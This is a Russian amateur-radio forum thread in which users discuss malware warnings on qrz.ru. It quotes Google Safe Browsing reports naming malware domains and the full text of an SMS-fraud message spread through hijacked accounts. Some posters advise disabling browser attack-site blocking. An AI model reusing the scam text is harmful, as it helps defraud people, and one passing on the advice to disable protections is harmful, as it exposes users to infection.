Уже дважды, при заходе на сайт qrz.ru, получил от Каспера предупреждение о троянской программе. Это у меня что то не так или KIS2010 права?
Вид для печати
Уже дважды, при заходе на сайт qrz.ru, получил от Каспера предупреждение о троянской программе. Это у меня что то не так или KIS2010 права?
а я вы знаете не получаю никаких сообщений антиворов, у меня их просто нет на компах, а зачем, что тормозил виндовс?
То же самое второй день NOD 32 выдает.Цитата:
Сообщение от RW4HM
Что бы смсски не слать :) Любимое занятие среднестатистического пользователя интернета. Один человек мне через день звонит, как не заведет ящик электронной почты, у него его все его воруют и воруют, а антивирус он ставить не хочет.....Цитата:
Сообщение от UT1YV
Проверил с трёх машин, где стоит "киса 2010", версия 9,0,736.
Почти все по дефаулту. у меня не наблюдается..
Antivir от Avira не жалуется, трояны могут быть на рекламных ссылках
Да просто жуть какая то!Если на форуме чисто,то стоит на главную или в колбук-сразу Dr.WEB ловит трояна Olicia68 -его убивает.А после перезагрузки я получаю прелесный порнобаннер! Форматировал 3 раза,обновлял до SP3 и проверял Даниловым-один хрен.Вчера установил Авиру-нашла 7 файлов.Пока вроде ничего нет.Правда на главную не хожу-боюсь. И еще-антиавторун нашел два файла на лиске D -Autotun.inf-папка.Не убивается ни чем. Вот дела-диск не системный и этой папки раньше не было и делать там ей нечего и убрать не могу-может кто подскажет?
вас послушать так надо и антиземлятресучки ставить, ибо трясет каждый день и целый день - http://www.oe-files.de/gmaps/eqmashup.htmlЦитата:
Сообщение от RA3PPV
Во вторник тоже получил. Избавился только так. С другого компа на флешку свежую версию сканера Др.Вэб. Запуск компа в безопасном режиме и запуск сканера. Нашел 3 штуки и убил.Цитата:
Сообщение от RW3PF
Береженого - бог бережет.Цитата:
Сообщение от UT1YV
кем береженого?Цитата:
Сообщение от RA3PPV
Уходил на полчаса с сайта, переходил на другой комп. Предупреждение перестало появляться.Цитата:
Сообщение от RW4HM
Русская народная пословица. В ней сказано все.Цитата:
Сообщение от UT1YV
но не сказано кем береженого бог бережет, я вот никогда не понимал этой русской пословицы, выбачтеЦитата:
Сообщение от RA3PPV
Бачте пан РабобоженкоЦитата:
Сообщение от UT1YV
Береженый — бережёный I м. разг. Тот, кто сам себя бережёт или кого бережёт кто либо.
Да немного подбили и qrz.ru - надеюсь подчистят. Классические выходки червей - стянули пароли фтпи доступа к сайту с машины на которой он был залились сюда и таком образом себя распространяет - достаточно эффективно если учесть что основная масса пользователей либо имеет антивирусы которые даже это не замечают либо вообще не считают нужным использовать антивирус чтобы " не тормозил винду".
Итог могу описать - у тех у кого ничего антивирус не видит самый минимальный вред - уже стянут пароль аськии от его имени рассылается сообщения всем кто был в контакте типа
"привет, есть класная новость для тебя! смори, кинь смску 501309304 на 8355 , мне уже пришло 127 рэ бабло на счет приходит )) отправляй,я офф , позже спишемся!и НИКОМУ про это не говори только! Больше 3 смс не отправляй, а то спалят!! "
а вобще то цель этих зловредов - тянуть данные кридитных карточек и т.п. ну надеюсь UT1YV не пользуетесь итернет банкингом иначе уже давнобы вам счета почистили
Если QRZ.ru плавно перейдет в разряд опасных сайтов, я не удивлюсь.Цитата:
Сообщение от UU4JKU
смотртите пример и дату сообщения :-)
http://forum.qrz.ru/post366507-172.html
представляю сколько народа подбито из радиолюбителей которые надеются что утилитой drweba можно что то вычистить или вообще нет смысла пользоваться антивирусом чтобы не тормозил машину - все аськи почты фтпдоступ на ресурсы везде и там эта гадость разведется и так снежным комом
Такое периодически возникает и админы мне на работе уже закрывали его.Цитата:
Сообщение от RW4HM
Очень часто происходят какие-то процессы, подвешивающие загрузку страниц - на мобиле также, вплоть до самопроизвольной выгрузки клиента. "Тяжесть" страниц QRZ не сравнить с другими сайтами. Зачем только..
Оно и понятно: судя по Вашим постам, Вам на компе терять нечего.Цитата:
Сообщение от UT1YV
АНАЛОГИЧНО и не только от Касперского,но AVAST кричит о наличии ТРОЯНА.Цитата:
Сообщение от RW4HM
Два или три дня у меня тоже самое! При каждом заходе на сайт.
Хуже будет, если за трояны qrz.ru забанит гугл. А сам по себе троян - частная проблеманекашерныхнеправедных ОС :)
просто у меня браузер не то что у васЦитата:
Сообщение от RV9CX
А Вы знаете, какой у меня браузер? А на мобильном телефоне, может тоже в курсе что я использую? А на других 3 компьютерах?? Искренне радуюсь за Вас, кудауш..Цитата:
Сообщение от UT1YV
Проблема есть, независимо от типа браузера - по-моему, это очевидно. А вот что у разных разные дыры - это да. Но это не к этому месту.
Нука мегабраузер в студиюЦитата:
Сообщение от UT1YV
Добавлено через 11 минут
Надеюсь что хоть не еще один щасливый пользователь линуксов ненавидящий виндовс со всеми его браузерами. Предчуствуя флейм по этой необъятной теме смею только заметить что более 90 % по всему миру народ пользуется виндой - и даже не только домашние а прежде всего корпоративные пользователи предприятия все все - винда - все ее ругают она плохая дырявая но как только поднимается вопрос про альтернативу - нормальный человек - бухгалтер производственник секретарь банкир продавец и все остальные где можно компьютер увидеть и слышать не хотят о другом понимая что опять надо переучиваться привыкать заново - именно поэтому в мировых масштабах у винды за 90% инталяций а у прекрасного защищенного линукса нету и 10 за все его 30 лет существования
Привет всем!
Я меня все нормально нет никакого вируса
НОД32 не сообщает про вирус
Мозилла броузер
аналогично, тьфу-тьфу-тьфу.... аваст молчит, др.веб молчит. на обоих машинах....Цитата:
Сообщение от UR5FCM
стоит мозилла с приблудами в виде антиспама и носкрипта ...
Один комп (о вреде ходить на qrz.ru в свободное время :)) на работе тоже пострадал - появился "прелестный баннер".
Вариант борьбы (без форматирования жесткого диска):
http://support.kaspersky.ru/viruses/deblocker При всей моей нелюбви к Касперскому :)
Далее какой-нибудь серьезный антивирусник с флэшки и убить вирус (он остается всеравно после разблокировки.
Комп пострадал т.к. не был оснащен (сейчас поставил, нет худа без добра) Аутпост ФэйрВолл. Пусть лучше тормозит слегка :)
Есть такое.Цитата:
Сообщение от RU4SO
Да, на подбитой машинке стоит XP...
У меня была проблема на главной страничку,но проблему быстро устранили
73 Al 4L5A
Я позавчера тоже стал обладателем сексуального банера! Привез комп на работу,
а там уже бук шефа с такой же проблемой.
Шеф правда уже кучу SMS послал в надежде на светлое будущее!-но УВЫ не оправдалось! деньги с телефона сняли даже спасибо не сказали! :-))
Ему помогла утилита с доктора Вэб!
А на моем админ парился, подбирал SMS! Вроде вылечил!
http://www.drweb.com/unlocker/index и вперёд!Цитата:
Сообщение от RZ9OO
То RZ9OO
Саня, глянь в конце второй странички :) Вчера на работе под горячую руку даже гвардейские матюки вспомнил (точнее сами с подкорки вылезли). :( Думаю, чего глбух ежится... Но... общие неприятности ... они ... обьединяют :)
Привет!
Поставьте программку UNLOCKER.
Она если сразу не удалит, то сделает это при перезагрузке компа.
Вопрос-какой прогой убить неубиваемые папки auturun.inf ?Нашел обе на дисках D и E. Диски не системные.Коммандер не убивает.
у меня друзья видят, мне этого достаточноЦитата:
Сообщение от RV9CX
сначала я нашел их в автозагрузке и откл, потом по ссылке в какой папке лежат и delЦитата:
Сообщение от RW3PF
там и там
Коллеги, давайте здесь обсуждать проблемы, которые могут иметь место непосредственно с работой портала QRZ.RU
А для прочих заморочек с вашим ПО есть раздел: http://forum.qrz.ru/forum26.html
А чего стоит перенести тему в ПО?Цитата:
Сообщение от RW3VZ
А зачем? Начало было правильное. Пользователи подняли вопрос о возможности появления заразы на страницах qrz.ru
Разумеется, эта тема адресована именно техподдержке. Разбираемся. Никакого криминала пока не выявлено.
Что же касается прочих вопросов своего ПО, то это - туда: http://forum.qrz.ru/forum26.html
Второй раз сообщаю , что виснет главная страница QRZ .RU . Это появилось недавно . Когда уходишь с неё на форум , всё работает нормально .
Я уже больше месяца, сообщаю что QRZ сборище свякой дряни, реакции ноль!Цитата:
Сообщение от RA9SFU
Посмотрим как заговорят когда действительно сайт упадет в черный!
Аналогичная ситуация.И появляется сообщение что Интернет эксплорер заблокировал загрузку какогото файла.На щётчике трафика аж 20 мв показывает.У меня с мобильного телефона интернет,это очень дорогое удовольствие за одно посищение сайта.Дальше страница зависает.:sos:Цитата:
Сообщение от RA9SFU
Уважаемые коллеги! Хочу предложить Вам воспользоваться браузером FireFOX + два дополнения:
1. NoScript
2. AdBlock Plus.
С помощью них всех нежелательные скрипты, равно как и рекламу(баннеры, картинки и прочее) можно отключить, съэкономив на этом трафик.
А может ближе к теме, предложите администрации сайта, следить за ресурсом обеспечивая безопасность посетителей.Цитата:
Сообщение от RX3QFY
Давайте ближе к теме... Позакрывал все программы, работающие с интернетом. Оставил только браузер. На картинках объем трафика до и после открытия главной страницы qrz.ru... Где 20мб? Где троян? Коллеги, следите за своей системой!
ЗЫ опять местами попутал! :)
Коллега если вы заметели, стартовая страница не "статичная", и то чтоЦитата:
Сообщение от UA4PCA
через 5 мин. вам не "промаячило" о вредоносно коде еще не повод соневатся в том
что из разных мест и с разным софтом пользователи сообщают о "аномалиях".
Смотри скрины хоть у старт топика, хоть мой.
Юрий , у меня установлен браузер Mozilla Firefox , он то и предупреждает о процессе . В компе не силён . Как выполнить пункты 1 и 2 . Процесс появляется только на главной странице QRZ.RU , не всегда , но слишком часто и последнее время . Видимо администрация перестала контролировать .
Что мне на это сказать... Захожу на стартовую, по меньшей мере, полста раз в день. Ни тормозов ни троянов не замечал НИ РАЗУ. А Вам могу посоветовать для начала почистить куки. Если уж не хотите сразу и навсегда поставить себе нужный защитный софт и забыть о всех проблемах.
Сейчас уже всё нормально.А днём проблемы наблюдались.Цитата:
Сообщение от UA4PCA
Почитайте на досуге...Цитата:
Сообщение от UA4PCA
http://forum.cqham.ru/viewtopic.php?...asc&&start=360
через 2 месяца после обнаружения
http://forum.qrz.ru/post283061-26.html
Как вы думаете сколько людей заходило за эти 2 месяца и ничего не знало.....
http://cq-vrn.ru/forum/index.php?topic=349Цитата:
Сообщение от RA9SFU
Специально для RN9AAA (и всем заинтересованным...). Вот так у меня выглядит в настоящий момент стартовая страница qrz.ru. Сравните со с своей. Ничего не замечаете?... ;)
Ну и в дополнение... Серверу надо существовать. Должны быть и рекламные поступления. Условия на размещение рекламы могут быть разные... К примеру: все мы знаем, что пресловутые порносайты набиты скриптами, malware, троянами и т.д. и т.п. Однако эти сайты не падают (почему-то :)). Если ваш компьютер не защищен в полной мере - заходить туда не просто опасно, смертельно опасно. Выводы делайте сами.
Убраны фреймовые баннеры рекламы справа. Сейчас зашел Бройлером и увидел. На Лисе они у меня отключены напрочь^Цитата:
Сообщение от UA4PCA
Юрий, совершенно правильно. Вот и не выполняются у меня никакие лишние скрипты.
Это даже не смешно....Цитата:
Сообщение от UA4PCA
Виктор, а оно Вам надо?! Настройте свой браузер. Вы сообщали, что интернет у Вас через мобильный... Так зачем Вам каждый раз грузить лишние картинки? Не только на этом сайте, а на многих, многих других.
При каких делах здесь картинки? Или вы совсем не пойнимаете о чем тут разговор?Цитата:
Сообщение от UA4PCA
Зайдите например сюда
http://www.ua9lak.qrz.ru
Пусть не понимаю... Вспоминается старый анекдот:
Пациент заходит к хирургу...
- Доктор. Почему, когда я пытаюсь почесать левой ногой правое ухо - у меня болит колено?
Понимаете, к чему я?
Что на Опере,что на ТорMoz-ille,все чисто.
антивирус KIS 8
Добавлено через 1 минуту
Нормальная страницаЦитата:
Сообщение от RN9AAA
Нормальная страницаЦитата:
Сообщение от UA3QLQ
Юрий вот что у меняЦитата:
Сообщение от RU4UU
А у меня вот чтоЦитата:
Сообщение от RN9AAA
Вас можно поздравить! Оно вас нашло!Цитата:
Сообщение от UA3QLQ
Просто под разными браузерами по разному успевает качнуть пикту
Опера см. рисунок
На сайте присутствует зараза последние три дня (KIS9)
Во написали за день! Недумал что такая чисто техническая, касающаяся только администрацию сайта проблема , привлечет столько внимания. Прочёл всё , вот результат, точнее эффект тотже.
Да на субдомене UA9LAK давно вирус и администрация вроде в курсе
Был момент когда главная страница тоже имела вирус
73 Al 4L5A
Сегодня вечером опять зашел на сайт. Картинка не заставила себя долго ждать:
Да бог с ним.прогнал комп каспером вроде нормально.Цитата:
Сообщение от RN9AAA
Сейчас попробывал зайти на сайт ua9lak через firefox-не пустил.Но все равно достала меня своими отстойными тормазами эта торМозила,перешел на Оперу,только пока не настроил её полностью.
Я тоже попробовал зайти, и Мозилла тоже не пустила.Цитата:
Сообщение от UA3QLQ
На счет тормозов - не соглашусь, открывается все мгновенно.
Говорите, не любите кошек? :)
Александр день добрый!Цитата:
Сообщение от RA9LZ
Наоборот обожаю.
Я лет 5 работал только на мозиле,сам её всем советовал,незнаю но последнее время меня она достала своими тормозами.Сейчас вот Опера и в ней все как на самолете.Цитата:
Сообщение от RA9LZ
Значит умеете их готовить.. :)))Цитата:
Сообщение от UA3QLQ
У меня с ней наоборот - никак не складываются отношения..Цитата:
Сообщение от UA3QLQ
На счет трояна: похоже Владимир DL7PGA был прав:
Разбираемся.Цитата:
Сообщение от DL7PGA
Вот.
просто товарищи, среди нас товарищи есть такие товарищи которые нам совсем не товарищи, вот
Ничего там нетЦитата:
Сообщение от RV4LX
Только что заходил на сайт QRZ.ru и все чисто
Странно. Тоже у меня NOD32
Сегодня утром зашел - опять появилось сообщение. Картинка повисела минуты две и пропала. NOD-32 не при чем. У всех разные антивирусники, а сообщения о Трояне практически одинаковые.Цитата:
Сообщение от UR5FCM
Про замеченную заразу на домашних страницах, которые хостятся на qrz.ru, почитайте статью: http://forum.qrz.ru/blog.php?b=39
Ну всё... сайт в черном списке. Обход блокировки позволяет зайти на сайт, но на писание сообщения в Лисе и Опере в нормальной режиме не представляется возможным. Я обошел это отключив все до кучи но все равно дает сбой через раз. И только зайдя ИЕ7(этим дырявым корытом) на сайт смог нормально написать это сообщение. А сколько людей не смогут сделать так?
Ага, о чем предупреждали.Цитата:
Сообщение от RX3QFY
Странно. У меня файрфокс после нажатия всего на на одну кнопку позволяет войти и написать.Цитата:
Сообщение от RX3QFY
У меня вроде все отправляется нормально
73 Al 4L5A
Вобще караул,с домашнего вообще зайти не смог блокирует система безопасности!Если в ближайшее время администрация не примет мер то п....!
По мере возможности захожу на сайт (по несколько раз в день), никаких проблем:umnik2:Цитата:
Сообщение от RX3QFY
Странно все это, друзья...
Каждый день захожу на форум через QRZ.RU - никаких замечаний!
Vista, Opera, AVG -все с самыми последними обновлениями. Никаких троянов на сайте. Скорее всего дело в провайдерах, с которыми имеете дело... :hi:
Скорее всего дело в провайдерах, с которыми имеете дело...
---------------
Причем тут провайдеры и официальная инфо от Гугла,читайте выше!
Сегодня Опера предупредила о трояне, заблокировала его и позволила работать дальше. Больше ничего подозрительного за последнее время на QRZ.RU не было.
Андрей, ты думаеш все кто создал страницу, гуру в компьютерах?Цитата:
Сообщение от RW3VZ
У меня AVAST опять па первой странице выдал предупреждение.
Вы ничего не путаете?Цитата:
Сообщение от RW3VA
Специально сейчас переключался на другой браузер - Firefox и там запускал встроенный AVG Security Toolbar на предмет проверки сайта на "благонадежность" - дает "зеленую улицу". У меня троянов не зафиксировано. :clapping:
Подождите,они пока заняты другими компьютерами!Не все сразУ!:stop:Цитата:
Сообщение от RX3ZZ
С гугл хрома зашел ,тоже предупреждает....Нажимаю-"все равно продолжить" и захожу.А гуглу выдает вот такую инфу:
http://safebrowsing.clients.google.c...lechrome&hl=ru
C IE захожу без проблем.
Обращаюсь к Администрации форума.
Уважаемые Администраторы форума! Для обеспечения нормального функционирования ресурса нужно:
1. УДАЛИТЬ ВСЕ фреймовые баннеры на главной странице до дальнейшего разбирательства с рекламодателями.
2. Удалить страницы частных пользователей содержащих вредоносный код.
3.. Зайти на сайт http://www.stopbadware.org/home/revi...ad27045-7.htmlЦитата:
Что произошло во время последнего просмотра этого сайта компанией Google?
Из протестированных нами за последние 90 дней страниц данного сайта (661) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 13. Последний раз сайт просматривался Google 2010-04-10, а подозрительное содержание было обнаружено 2010-04-04.
Malicious software includes 19 exploit(s), 5 trojan(s), 2 scripting exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Количество доменов, на которых размещается вредоносное ПО, равняется 16, включая afonya123.com/, litetopfindworld.cn/, d99q.cn/.
Несколько доменов (5), по всей видимости, является промежуточными звеньями в распространении вредоносного ПО среди посетителей этого сайта, включая should-be.cn/, dnparking.com/, afonya123.com/.
This site was hosted on 1 network(s) including AS28968 (EUT).
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт qrz.ru не был промежуточным звеном в заражении других сайтов.
Размещается ли на этом сайте вредоносное программное обеспечение?
Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.
Как это произошло?
В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.
и отметиться что вредоносный код почищен. В течение суток гугл протестирует заново и снимет предупреждения.
Вы потеряете 3..5 частных страниц, но сохраните пользователей.
Несколько недобросовестных держателей страниц на сайте не следят за своими личными компьютерами, а страдают ВСЕ посетители имеющие свою локальную защиту.
Подтверждаю, у меня тоже ругается Каспер.
И Мозилла блокирует вход.
подтверждаю
блокировка входа хромом
Проверьте сейчас. Меры приняты.
хром выдал блокировку
Выдает это:
Безопасный просмотр
Страница диагностики для qrz.ru
Занесен ли сайт qrz.ru в список подозрительных веб-сайтов?
Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.
В некоторой части этого сайта несколько раз (14) за последние 90 дней была замечена подозрительная активность.
Что произошло во время последнего просмотра этого сайта компанией Google?
Из протестированных нами за последние 90 дней страниц данного сайта (752) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 68. Последний раз сайт просматривался Google 2010-04-10, а подозрительное содержание было обнаружено 2010-04-10.
Malicious software includes 19 exploit(s), 5 trojan(s), 2 scripting exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Количество доменов, на которых размещается вредоносное ПО, равняется 17, включая trfistc.info/, afonya123.com/, litetopfindworld.cn/.
Несколько доменов (5), по всей видимости, является промежуточными звеньями в распространении вредоносного ПО среди посетителей этого сайта, включая should-be.cn/, dnparking.com/, afonya123.com/.
This site was hosted on 1 network(s) including AS28968 (EUT).
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт qrz.ru действовал в качестве промежуточного звена в заражении других сайтов (1), включая hamradio.su/.
Размещается ли на этом сайте вредоносное программное обеспечение?
Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.
Как это произошло?
В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.
Для Windows браузеров:
1) IE-8 - OK
2) Opera-10.51 - OK
3) Safari-4.0.5 - OK
4) Chrome-4.1.249.1045 (42898) - ругается первые раз, потом - OK
5) Mozilla-3.6.3 - ругается
Вхожу целый день, Firefox + Avira, никаких проблем. Скорее всего были заражены либо баннеры, либо конкретные страницы.Цитата:
Сообщение от UR3IRS
Ругаться могут браузеры "черпающие" инфо о сайте с гугла. С хромом понятно, у Лисы просто стоит выключить "Блокировать сайты подозреваемые в атаках", ибо это просто указка из гугла. По желанию, естессно. Пока он (гугл) обновит инфо...
Скорее всего - Chrome и Mozilla стучатся в Google, а тот им даёт команду на ругань вот и всё.
Все равно хром ругается:
Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
На веб-сайте по адресу forum.qrz.ru, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполнять действия без вашего согласия. Ваш компьютер может быть заражен при посещении такого узла.
Для получения подробных сведений о проблемах с этим сайтом воспользуйтесь этой ссылкой: Страница диагностики безопасного просмотра для forum.qrz.ru.
Подробнее о том, как защититься от вредоносного ПО, распространяемого в Интернете.
Я осознаю, что посещение этого сайта может нанести вред моему компьютеру.
Добавлено через 1 минуту
Нет дыма без огня...Цитата:
Сообщение от UR3IRS
А Каспер молчит...до него просто не доходит
Конечно же, Каспер!Цитата:
Сообщение от RU4UU
Xus!
/...у меня сейчас АВАСТ установлен - ничего не наблюдал такого.. специально проверил после этого весь комп Каспером и Вебом - ничего не нашли...значит Аваст ничего не только не нашел, но и не пропустил.?
Только что получил атаку:
Сетевые атаки
-------------
Время Описание атаки Источник Протокол Локальный порт
----- -------------- -------- -------- --------------
10.04.2010 23:51:22 Intrusion.Win.MSSQL.worm.Helkern 122.225.100.154 UDP 1434
Цитата:
Сообщение от UX0IM
Могут пройти сутки-двое, пока обновится кэш поисковика.Цитата:
Сообщение от UN7RX
Ну,что ты теперь скажеш?Цитата:
Сообщение от UA4PCA
Видимо как в поговорке "Бог шельму метит"?:)Цитата:
Сообщение от Andy 811
Справились?Цитата:
Сообщение от RW3PF
Mozilla и KIS 2010 не пускают...
Сижу в IE8
А причем здесь Аваст, Нод, Каспер и остальные? вы делаете запрос на страницу и получаете отказ от браузера.А вот когда в комп попадет тогда все они и взвоют.Цитата:
Сообщение от UA3ASR
Добавлено через 5 минут
может это дубликаты? Advanced system care проверял у себя...полно таких а удалять боязно,почти одинаковые в разных местах,но ...почтиЦитата:
Сообщение от RW3PF
Добавлено через 3 минуты
Совсем отключил уведомления..только отвлекает,постоянно кто то атакует...ну и .....с ними пусть атакуют если делать нечегоЦитата:
Сообщение от RW3VA
Добавлено через 1 минуту
А что, нельзя разрешить Мазиле и КИС-у?Цитата:
Сообщение от UA1CEC
IE8 + Avast! 4.8 Pro - почти сутки провисел на qrz.ru - и тишина.
А попробуйте без них :) Долго ли будет- бла-бла-блаЦитата:
Сообщение от R3A-770
IE-8 с горем пополам работает но временами пытается подвиснуть,антивир пока молчит!
Может кому сгодится http://swim7.narod.ru/onlinescaner.html
ДА!Цитата:
Сообщение от RA3DCT
Добавлено через 1 минуту
Ага дубликаты-трояна.....Цитата:
Сообщение от UX0IM
Вот пожалуйста сегодня утром,только открыл страницу!
КИС отключил, а в Мозиле идёт переадресация на http://www.stopbadware.org ?!Цитата:
Сообщение от UX0IM
Привет коллеги !
У меня этих фокусов не было. Установлен KIS2010 лицензионный. Браузеры IE8 и Firefox от Mozilly . Правда заходил на QRZ.RU вчера и вот сегодня. Проблем нет....
У меня ie-8 пускает а вот Firefox нет!Цитата:
Сообщение от RA3BB
Уважаемые коллеги! давайте не будем спорить нужен ли антивирус или нет.
На СКР при всей защите компьютера допуск нормальный? Нормальный. Нужно немного подождать, что бы гугль проиндексировал этот ресурс сети и разрешил доступ.А те, кто ради одного сайта в сети стремятся отключить все защиты - делать медвежью услугу своей операционной системе. Лучше перейти временно на другой браузер, чем отключать защиту.
Аналогично.Цитата:
Сообщение от Andy 811
А вы отмените последние апдейты Фаерфокса.Цитата:
Сообщение от Andy 811
Забыл добавить - на моём компьютере используется McAfee Personal Firewall Plus 7.0 старьё конечно, но меня устраивает.
Стандартный брэндмауэр ХР отключен.
А так же:
На этом доступном языке будешь говорить среди себе подобных...понял " умник"! Пользователь "лучший" блин!!!Цитата:
Сообщение от R3A-770
Цитата:
Сообщение от R3A-770
Это еще зачем я буду делать,глупее предложения не видел!Люди стремятся к совершенству программ а я буду под зараженный сайт подстраиваться!Не смешно ли?!Я уже писал что и ie-8 временами тоже призадумывается,а сегодня утром троян с рекламы на сайте пытался заскочить!Благо что в-7 лицензионный и антивир тоже а если был бы ломанный хр то я думаю я бы здесь уже не писал!До этого все работало на всех браузерах отлично а вчера началось у меня хотя люди писали об этом и раньше!
Лучшее иногда бывает враг хорошего.Цитата:
Сообщение от Andy 811
То же касается ломанного - неломанного. И тем более W7.
Если вы полагаете, что лицензия гарантирует без-сбойную работу - то это увы заблуждение.
Дальше думайте сами.
Маленькая подсказка - обратите внимание на скриншот постом выше.
Каким образом могла превратится в троян маленькая безобидная программа, к которой не было никаких обращений более года?
QRZ.ru перестал пускать FF. Попробовал а SAFARI.
Получил предупреждение:
<img src="http://www.cqdx.ru/blog/wp-content/uploads/2010/04/Screen-shot-2010-04-11-at-1.39.04-PM.png" />
Вот постоянная история когда заходишь на эту страницу,браузер сначала подвисает а потом выдает это!Раньше этого не было!
Так это в первую очередь надо спросить в компании Майкрософт - почему какой-то там ерундовый сценарий может замедлить работу веб-обозревателя, за который отвалена куча денег?Цитата:
Сообщение от Andy 811
Вам ответят примерно "ну вам же не нравится, когда страница зависает (в связи с нестабильной работой операционной системы - хотя об этом конечно же умолчат) - вот мы и предусмотрели возможность защиты от такого дела, за это с вас взяты деньги".
Не знаю кто как, а я больше доверяю вот этомучем браузеру. И в большинстве случаев это оказывается верно.Цитата:
Сообщение от UR3IRS
Вы меня поражаете своими предложениями!Цитата:
Сообщение от R3A-770
Неужто? Это вы меня поражаете!Цитата:
Сообщение от Andy 811
Вы заплатили деньги за что-то, а оно у вас не работает?
Представьте, что речь идёт например... о пылесосе.
Ваши действия?
Вы обратитесь:
1. в магазин
2. к изготовителю пылесоса
3. к изготовителю ковра и паркета
4. к изготовителю пыли?
Кстати сказать, компьютер под управлением ОС подключенный к Интернету довольно сильно напоминает неуправляемый пылесос.
Цитата:
Сообщение от R3A-770
Напишу администрации QRZ,про пылесосы это вы в другой форум:offtopic:
Про пылесос напишете?? Вы их обрадуете, несомненно. :)Цитата:
Сообщение от Andy 811
Извините, но Вы несете чушь. Вы вообще представляете, что такое сценарий? (естественно в данном контексте, а не сценарий, на основе которого снимают фильмы) Вы представляете, что такое ActiveX, что такое скрипты? Как все это работает, и знаете ли пути проникновения вируса в компьютер?Цитата:
Сообщение от R3A-770
С пылесосом неудачный пример, вот Вам более удачный пример. Допустим, Вы купили автомобиль, а какой-то нехороший человек взял и проколол на нем колеса, в результате чего Ваш автомобиль уже не может ехать так как он ехал ранее. С кого Вы будете спрашивать, почему Ваш автомобиль из-за каких-то ерундовых шин перестал быстро ездить? С автопроизводителя? Причем этот нехороший человек может не только шины проколоть, а еще слить масло с Вашего авто и в этом случае Вы вообще первое время ничего не заметите, но вот только через некоторое время мотор Вашей машина придет в полную негодность. Вы опять будете привлекать к ответственности автопроизводителя?
В этом примере машина – компьютер, колеса - сценарий, а нехороший человек хакер или программист сделавший вирус.
Ну вот.Мой e-mail взломали.
Вирусы на сайте это плохо.
Не годится. В случае Andy 811 до вируса или хакера ещё довольно далеко. Зато налицо микрокод, который завешивает IE. Или же фрагмент микрокода, который система безопасности IE под W-7 опознала как вредоносный, порому что он конфликтует вероятно с какой-то например надстройкой. У меня было нечто подобное с Yahoo! Toolbar, правда довольно давно, который установился вместе с ещё какой-то программой, которую я очень хотел. Да-да, с тех пор я знаю как проникают вирусы на компьютер!Цитата:
Сообщение от RA3DCT
Единственное что, теперь у меня стал загружаться почему-то Adobe Acrobat при открытии qrz.ru .
Ну и сылки на сайты с разводом на деньги - тоже не есть хорошо. Впрочем, бизнес есть бизнес.
В случае с лицензированным ПО логичнее обратиться к производителю оного, с которым есть договор купли-продажи, а стало быть и техподдержка, а не канифолить мозги администрации бесплатного ресурса, которая в принципе вообще никому ничего не должна, кроме рекламодателей.
Впрочем опять же - это кому чего больше нравится.
Гораздо ближе, чем Вам кажется.Цитата:
Сообщение от R3A-770
Вот этот самый микрокод, в данном случае зловредный, и был внедрен в Интернет страницу таким далеким для Вас хакером и оказавшимся таким близким для Andy 811Цитата:
Сообщение от R3A-770
Вам, конечно же, из дома виднее, чем администрации ресурса.Цитата:
Сообщение от RA3DCT
Если думать про хакера как про того суслика, которого не видишь, а он всё равно есть и грызёт всё подряд - то да, всё действительно так. Но у хакеров есть занятия поинтереснее, поверьте. Я не имею в виду школоту, которая брутит пароли от асек и почты. А кроме того, оказался близким лишь для некоторых компьютеров, но не для большинства. Почему же?Цитата:
Сообщение от RA3DCT
И может быть вы, как знаток, всё-таки поясните мне - какой такой хакер заразил трояном программу в моём компьютере, о которой я и думать то забыл что она вобще есть, и зачем ему это было надо?
Ну что касается администрации, то я администратору сообщил об этом еще 7 апреля, причем со всеми подробностями – где, в каких случаях и как проявляет себя вирус.Цитата:
Сообщение от R3A-770
Я знаю кто, чем и как интересуется. Можете поверить, с некоторыми я даже знаком.Цитата:
Но у хакеров есть занятия поинтереснее, поверьте.
Мало вероятно, что кого-то заинтересовал конкретно Ваш компьютер и кто-то конкретно Вам подкинул троянца. Вы просто попали под раздачу, но вот если бы троян которого Вы подцепили, нашел бы что-то интересное на Вашем компьютере, то вполне возможно, что Вы могли бы прилично пострадать. А вот зачем кто-то пишет Троянов, так это нужно спрашивать у того, кто их пишет. Каждый преследует свои конкретные цели. Вот для примера. В конце января было совершено множество краж денежных средств с кошельков WebMoney. Причем крали не сотни и тысячи, а десятки и даже сотни тысяч рублей и долларов.Цитата:
какой такой хакер заразил трояном программу в моём компьютере, о которой я и думать то забыл что она вобще есть, и зачем ему это было надо?
Не вдаваясь особо в подробности скажу одно - никакого троянца не было. Дальнейший диспут считаю бессмысленным.Цитата:
Сообщение от RA3DCT
Ваша программа не превратилась в троян, она им заразилась. Здесь все как у людей. Если кто-то заболел гриппом, то он же не превратился сам в грипп. Просто внутри этого человека живет вирус. И заметьте человек может даже не знать, что он болеет и при этом заражать всех подряд. Как, например с гонореей. Женщина, болеющая гонореей, не знает об этом, но может стольких мужчин заразить, что просто диву даешься. И что поражает! ведь многие мужчины, имея при себе антивирусы их, отключают и лезут, куда не нужно. Воистину любители острых ощущений!Цитата:
Сообщение от R3A-770
Мда, - "и эти люди запрещают мне ковыряться в носу..." (с)
Вы просто очень много пишите, но мало читаете даже эту ветку.Цитата:
Сообщение от R3A-770
А ответ на ваш вопрос для внимательных читателей давно дан в этой теме, и даже в картинках :-)
http://forum.qrz.ru/post381266-69.html
Виктор да он пишет ради того чтобы писать,а думать ...короче бесполезно!Цитата:
Сообщение от RN9AAA
Вот ради интереса набрал в поисковиках,и получил что и должно было быть!
Страстей понаписали .....
Каждый день по несколько раз захожу на qrz.ru
